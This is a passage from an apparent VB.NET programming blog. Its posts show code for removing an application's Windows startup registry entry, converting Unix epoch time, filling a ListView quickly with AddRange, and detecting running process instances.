       Security.AccessControl.RegistryRights.SetValue)
     RegKey.DeleteValue(AppName, False)
     Return True
   Else
     RegRoot = Microsoft.Win32.Registry.CurrentUser
     RegKey = RegRoot.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", _
       RegistryKeyPermissionCheck.ReadWriteSubTree, _
       Security.AccessControl.RegistryRights.SetValue)
     RegKey.DeleteValue(AppName, False)
     Return True
   End If
 Catch ex As Exception
   Return False
 End Try

End Function

Again, if everything goes right, the function returns True. Otherwise operation failed. And the most common reason for failure is inadequate permissions to modify the registry.

Compatibility with Windows Vista

I have used this code with standard user account in Windows Vista without any problems. I have also tested it with Windows XP, but not with any earlier Windows versions. However, if you do get problems with registry permissions, check out System.Security.AccessControl namespace. It provides methods to handle permission issues.

Epoch time in VB.NET

2008-09-15T02:56:00.001-07:00

Unix and Unix-like systems, like Linuxes, use Unix Epoch time in system time and time handling libraries. Sometimes you may need to handle these Epoch times in VB.NET or simply convert Epoch times to VB.NET's DateTime type.

Unix Epoch is the number of seconds from midnight January 1, 1970 and value is commonly stored in signed 32-bit integer value. This, however, causes so called year 2038 problem because in January 19, 2038 value reaches 2 147 483 647 and after that "wraps around". But let's not worry about that.

Convert Unix Epoch time to VB.NET DateTime value

Next function returns non-negative Epoch time in VB.NET's DateTime format.

''' <summary>
''' Converts Unix's epoch time to VB DateTime value
''' </summary>
''' <param name="EpochValue">Epoch time (seconds)</param>
''' <returns>VB Date</returns>
''' <remarks></remarks>
Public Function EpochToDateTime(ByVal EpochValue As Integer) As Date
 '
 If EpochValue >= 0 Then
   Return CDate("1.1.1970 00:00:00").AddSeconds(EpochValue)
 Else
   Return CDate("1.1.1970 00:00:00")
 End If

End Function

With negative parameters, the value returned is the same as with Epoch time 0.

Convert VB.NET DateTime value to Unix's Epoch time

The function below converts DateTime type back to Unix's Epoch time.

''' <summary>
''' Converts VB DateTime value to Unix's epoch time
''' </summary>
''' <param name="DateTimeValue">DateTime to convert</param>
''' <returns>Epoch time (seconds)</returns>
''' <remarks></remarks>
Public Function DateTimeToEpoch(ByVal DateTimeValue As Date) As Integer
 '
 Try
   Return CInt(DateTimeValue.Subtract(CDate("1.1.1970 00:00:00")).TotalSeconds)
 Catch ex As System.OverflowException
   Return -1
 End Try

End Function

Since .NET's DateTime can store dates far beyond year 2038, function traps OverFlow exception. When you use this function, you have to check that the returned value is positive integer and consequently valid Epoch value.

The fastest way to fill ListView control

2008-09-05T02:05:00.001-07:00

Filling ListView control with Add method in VB.NET is fast enough when you are dealing with only a few items. Things get different when you have to insert hundreds or maybe a few thousands items to ListView control. In this case the user may experience a noticeable delay in the application.

The solution is to use AddRange method which is the fastest way to fill ListView control. Below is the comparison of these two methods.

Fill ListView control with Add method

The sample code uses ListView control in Details-mode with one column. The loop inserts 10 000 items to control. Timing method is simple and it is not meant to provide neither totally exact nor precise timing.

''' <summary>
''' Fill listview with Add method
''' </summary>
''' <param name="ListView1">ListView object</param>
''' <remarks></remarks>
Public Sub FillListViewWithAdd(ByRef ListView1 As ListView)
 '
 Dim StartTime As DateTime
 Dim Elapsed As Double
 Dim TempStr() As String
 Dim TempNode As ListViewItem
 Dim i As Integer

 ListView1.View = View.Details
 ListView1.Columns.Clear()
 ListView1.Columns.Add("Name", 180)
 ListView1.Items.Clear()

 ReDim TempStr(0)
 StartTime = System.DateTime.Now
 For i = 0 To 9999
   TempStr(0) = "Name" & i.ToString
   TempNode = New ListViewItem(TempStr)
   TempNode.Tag = i.ToString
   ListView1.Items.Add(TempNode)
 Next i
 Elapsed = System.DateTime.Now.Subtract(StartTime).TotalMilliseconds
 MessageBox.Show("Elapsed time " & Elapsed.ToString & " ms with ListView.Add", _
   "Elapsed Time", _
   MessageBoxButtons.OK, _
   MessageBoxIcon.Information)

End Sub

And the result is:

Fill ListView control with AddRange method

The sample code is basically same as above. Only differences are storing first ListViewItems to array and after that using AddRange method to insert items to ListView control.

''' <summary>
''' Fill listview with AddRange method
''' </summary>
''' <param name="ListView1">ListView object</param>
''' <remarks></remarks>
Public Sub FillListViewWithAddRange(ByRef ListView1 As ListView)
 '
 Dim StartTime As DateTime
 Dim Elapsed As Double
 Dim TempStr() As String
 Dim TempNode As ListViewItem
 Dim TempArr() As ListViewItem
 Dim i As Integer

 ListView1.View = View.Details
 ListView1.Columns.Clear()
 ListView1.Columns.Add("Name", 180)
 ListView1.Items.Clear()

 ReDim TempStr(0)
 ReDim TempArr(9999)
 StartTime = System.DateTime.Now
 For i = 0 To 9999
   TempStr(0) = "Name" & i.ToString
   TempNode = New ListViewItem(TempStr)
   TempNode.Tag = i.ToString
   TempArr(i) = TempNode
 Next i
 ListView1.Items.AddRange(TempArr)
 Elapsed = System.DateTime.Now.Subtract(StartTime).TotalMilliseconds
 MessageBox.Show("Elapsed time " & Elapsed.ToString & " ms with ListView.AddRange", _
   "Elapsed Time", _
   MessageBoxButtons.OK, _
   MessageBoxIcon.Information)

End Sub

And the result is:

Add method versus AddRange method

The conclusion is very clear. AddRange method offers the fastest way to fill ListView control. In the sample codes above the AddRange method was five times faster compared to Add method. This does not make Add method obsolete by any means. When you are dealing with only a few or a few hundreds of items, you may well use Add method.

Check if application is running

2008-08-26T07:54:00.001-07:00

Sometimes you have to prevent user from starting more than one instance of your application. First you have to check if your application is already running.

VB.NET code snippet below returns true if a second instance of the application has been started.

''' <summary>
''' Check if an instance of this application is running
''' </summary>
''' <returns></returns>
''' <remarks></remarks>
Public Function IsProcessRunning() As Boolean
 '
 Try
   If Process.GetProcessesByName(Process.GetCurrentProcess.ProcessName).GetUpperBound(0) > 0 Then
     Return True
   Else
     Return False
   End If
 Catch
   Return False
 End Try

End Function

If the function returns true, you may show a message box to tell the user that application is already running.

The function above can be made more general by giving process name as a parameter. Below is a modified version that returns number of running process instances.

''' <summary>
''' Return number of process instances
''' </summary>
''' <param name="ProcessName">Processes friendly name</param>
''' <returns>Number of instances</returns>
''' <remarks></remarks>
Public Function ProcessesRunning(ByVal ProcessName As String) As Integer
 '
 Try
   Return Process.GetProcessesByName(ProcessName).GetUpperBound(0) + 1
 Catch
   Return 0
 End Try

End Function

Now you can check, for example, how many instances of the Notepad are running:

MessageBox.Show("There are " & ProcessesRunning("Notepad").ToString & _
 " Notepad instances running", _
 "Process Count", _
 MessageBoxButtons.OK, _
 MessageBoxIcon.Information)

You can use also this version to test if your application is running:

If ProcessesRunning(Process.GetCurrentProcess.ProcessName) > 1 Then
 ' Second instance was started
End If

And then notify user that the application is already running.